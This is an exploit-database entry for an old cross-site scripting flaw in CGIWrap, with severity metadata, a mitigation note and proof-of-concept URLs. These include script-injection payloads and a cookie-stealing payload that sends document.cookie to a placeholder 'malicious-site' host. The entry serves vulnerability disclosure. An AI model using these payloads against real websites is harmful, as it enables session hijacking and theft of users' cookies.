header-logo
Suggest Exploit
vendor:
CGIWrap
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-site Scripting (XSS)
79
CWE
Product Name: CGIWrap
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: cgiwrap
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

CGIWrap does not filter embedded scripting commands from user-supplied input

CGIWrap is a free, open-source program for running CGI securely. A web user may submit a malicious link into any form which displays user-supplied input, such as guestbooks, forums, etc. Users clicking on the link will have the malicious scripting commands executed in their browser. JavaScript code can be executed, as well as stealing cookies issued by the website.

Mitigation:

Input validation should be used to detect and reject malicious input. Sanitize user input to prevent malicious code from being executed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/3081/info

CGIWrap is a free, open-source program for running CGI securely.

CGIWrap does not filter embedded scripting commands from user-supplied input. A web user may submit a malicious link into any form which displays user-supplied input, such as guestbooks, forums, etc. Users clicking on the link will have the malicious scripting commands executed in their browser.

http://www.example.org/cgi-bin/cgiwrap/%3CS%3E
http://www.example.org/cgi-bin/cgiwrap/<S>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

JavaScript code will be executed:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
http://www.example.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>

Stealing your Cookies issued by www.example.org, if any:

http://www.example.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>

Navigation

Suggest Exploit

Services By CQR